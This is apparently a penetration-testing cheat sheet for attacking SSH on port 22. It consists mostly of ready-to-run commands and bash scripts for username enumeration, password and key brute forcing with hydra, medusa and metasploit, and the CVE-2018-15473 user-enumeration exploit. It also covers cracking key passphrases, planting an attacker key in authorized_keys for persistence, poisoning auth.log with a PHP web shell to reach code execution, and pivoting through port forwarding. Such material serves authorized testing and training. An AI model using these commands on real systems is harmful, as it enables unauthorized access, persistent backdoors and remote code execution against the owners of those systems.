22 - SSH
Information
Default Port: 22
PORT STATE SERVICE
22/tcp open ssh
Enumeration
nc -vn 192.168.1.2 22
timeout 0.1 bash -c "nc -nv 192.168.1.2 22"
nmap -p22 -sS 192.168.1.2
nmap -p22 -sVC 192.168.1.2
Connect
ssh user@192.168.1.2 # ip (default port)
ssh user@domain.tld # domain (default port)
ssh user@192.168.1.2 -p 1234 # other port
ssh -6 user@2a02:2e02:97c0:b500:1968:8cbb:002d:1809 # ipv6
ssh -X user@192.168.1.2 # X11
ssh user@192.168.1.2 -i id_rsa # private key (id_rsa)
ssh user@192.168.1.2 -t "bash --noprofile" # bypass restricted bash (rbash)
ssh user@192.168.1.2 -oKexAlgorithms=+diffie-hellman-group1-sha1 # error: no matching key exchange method found
ssh user@192.168.1.2 -o StrictHostKeyChecking=no # ignore: yes/no/fingerprint
# apt install -y sshpass
sshpass -p 'Password123!' ssh root@192.168.1.2 # normal
sshpass -p 'Password123!' ssh root@192.168.1.2 -o StrictHostKeyChecking=no # ignore: yes/no/fingerprint
# metasploit
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.2
set username peter
set password peterpan
exploit
sessions -l
sessions -i 1
User Enumeration
Brute Force
hydra -t 64 -L users.dic -p P@ssword1 ssh://192.168.1.2 -F -I
PasswordAuthentication
#!/bin/bash
trap ctrl_c INT
RED="\e[91m"
GREEN="\e[92m"
YELLOW="\e[93m"
BLUE="\e[34m"
WHITE="\e[97m"
USERS=$(<names.txt)
RHOST="192.168.1.2"
RPORT="22"
function ctrl_c(){
echo
exit 1
}
for USER in ${USERS}; do
timeout 0.5 ssh ${USER}@${RHOST} -p ${RPORT} -o StrictHostKeyChecking=no &>/dev/null
if [ $? -ne 255 ]; then
echo -e "${BLUE}SSH ${WHITE}${RHOST}:${RPORT} ${GREEN}[+] ${WHITE}User ${GREEN}${USER} ${YELLOW}(Pwn3d!)"
exit
else
echo -e "${BLUE}SSH ${WHITE}${RHOST}:${RPORT} ${RED}[-] ${WHITE}User ${RED}${USER} ${WHITE}Permission denied (publickey)"
fi
done
id_rsa
Bash
#!/bin/bash
trap ctrl_c INT
RED="\e[91m"
GREEN="\e[92m"
YELLOW="\e[93m"
BLUE="\e[34m"
WHITE="\e[97m"
USERS=$(<user.dic)
KEY="id_rsa"
RHOST="192.168.1.2"
RPORT="22"
function ctrl_c(){
echo
exit 1
}
chmod 600 ${KEY}
for USER in ${USERS}; do
timeout 0.5 ssh ${USER}@${RHOST} -p ${RPORT} -i ${KEY} -x id &>/dev/null
if [ $? -eq 0 ]; then
echo -e "${BLUE}SSH ${WHITE}${RHOST}:${RPORT} ${GREEN}[+] ${WHITE}User ${GREEN}${USER} ${YELLOW}(Pwn3d!)"
exit
else
echo -e "${BLUE}SSH ${WHITE}${RHOST}:${RPORT} ${RED}[-] ${WHITE}User ${RED}${USER} ${WHITE}is invalid"
fi
done
Metasploit
❯ msfconsole -q
msf6 > use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show OPTIONS
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 192.168.1.2
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set USER_FILE users.dic
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > run
CVE-2018-15473 (OpenSSH 2.3 < 7.7)
https://github.com/Sait-Nuri/CVE-2018-15473
Manual
python3 CVE-2018-15473.py 192.168.1.2 -u root
[+] root is a valid username
python3 CVE-2018-15473.py 192.168.1.2 -u roott
[-] roott is an invalid username
Wordlist
python3 CVE-2018-15473.py 192.168.1.2 -w /SecLists/Usernames/Names/names.txt
python3 CVE-2018-15473.py 192.168.1.2 -w /SecLists/Usernames/Names/names.txt | grep -v "invalid"
python3 CVE-2018-15473.py 192.168.1.2 -w /opt/SecLists/Usernames/xato-net-10-million-usernames.txt
python3 CVE-2018-15473.py 192.168.1.2 -w /opt/SecLists/Usernames/xato-net-10-million-usernames.txt | grep -v "invalid"
Password Brute Force
hydra -t 64 -l admin -P rockyou.txt ssh://192.168.1.2 -f -I
hydra -t 64 -l admin -P rockyou.txt ssh://192.168.1.2:65000 -f -I
medusa -h 192.168.1.2 -u root -P rockyou.txt -M ssh -v 4 -f
medusa -h 192.168.1.2 -u root -P rockyou.txt -t 10 -M ssh -v 4 -f 2>/dev/null
medusa -h 192.168.1.2 -n 65000 -u one -P rockyou.txt -t 10 -M ssh -v 4 -f 2>/dev/null
ncrack --user root -P rockyou.txt 192.168.1.2:22 -f
patator ssh_login user=user password=FILE0 0=rockyou.txt host=192.168.1.2 -x ignore:mesg='Authentication failed.'
patator ssh_login user=root password=FILE0 0=rockyou.txt host=192.168.1.2 -x ignore:code=1
# metasploit
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.1.2
set USERNAME root
set PASS_FILE rockyou.txt
set VERBOSE true
run
Keys
Generate
ssh-keygen
ssh-keygen -t rsa
mv /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
OpenSSL
openssl genrsa -des3 -out private.pem 2048
openssl rsa -in private.pem -outform PEM -pubout -out public.pem
puttygen
cd ~/.ssh
puttygen -t rsa -o id_rsa -O private-openssh
puttygen id_rsa -o authorized_keys -O public-openssh
Import
ssh-copy
ssh-copy-id user@192.168.1.2
Cracking
JohnTheRipper
https://github.com/openwall/john
ssh2john.py id_rsa > hash
john --wordlist=rockyou.txt hash
john --show hash
RSAcrack
https://github.com/d4t4s3c/RSAcrack
RSAcrack -w rockyou.txt -k id_rsa
Persistence
Attacker
❯ ssh-keygen
❯ cd .ssh
❯ ls -l
.rw------- root root 2.5 KB Tue Aug 22 08:50:33 2023 id_rsa
.rw-r--r-- root root 563 B Tue Aug 22 08:50:33 2023 id_rsa.pub
❯ cat id_rsa.pub |xclip -sel clip
Victim
user@victim:~/.ssh$ nano authorized_keys
user@victim:~/.ssh$ chmod 600 authorized_keys
Attacker
❯ ssh user@192.168.1.2
Files
/etc/ssh/sshd_config # config file
/var/log/auth.log # log file
Log Poisoning
ssh '<?php system($_GET["cmd"]); ?>'@192.168.1.2
http://192.168.1.2/file.php?file=/var/log/auth.log&cmd=id
Port Forwarding
Local
Attacker > Victim
ssh victim@192.168.1.2 -L 80:127.0.0.1:80 # port
ssh victim@192.168.1.2 -L 80:127.0.0.1:80 -L 81:127.0.0.1:81 # ports
sshpass -p 'P@ssW0rd123' ssh victim@192.168.1.2 -L 80:127.0.0.1:80 # password (one liner)
Remote
Victim > Attacker
service ssh start # run service (attacker machine)
ssh kali@192.168.1.2 -R 80:127.0.0.1:80 # port
ssh kali@192.168.1.2 -R 80:127.0.0.1:80 -R 81:127.0.0.1:81 # ports
sshpass -p 'P@ssW0rd123' ssh kali@192.168.1.2 -R 80:127.0.0.1:80 # password (one liner)
Dinamic
Attacker > Victim
ssh victim@192.168.1.2 -D 1080
# apt install -y proxychains4
# nano /etc/proxychains4.conf
# socks5 127.0.0.1 1080
proxychains -q nmap -sT -p- 127.0.0.1
proxychains -q curl http://127.0.0.1:80
http://192.168.1.2/file.php?file=/var/log/auth.log&cmd=id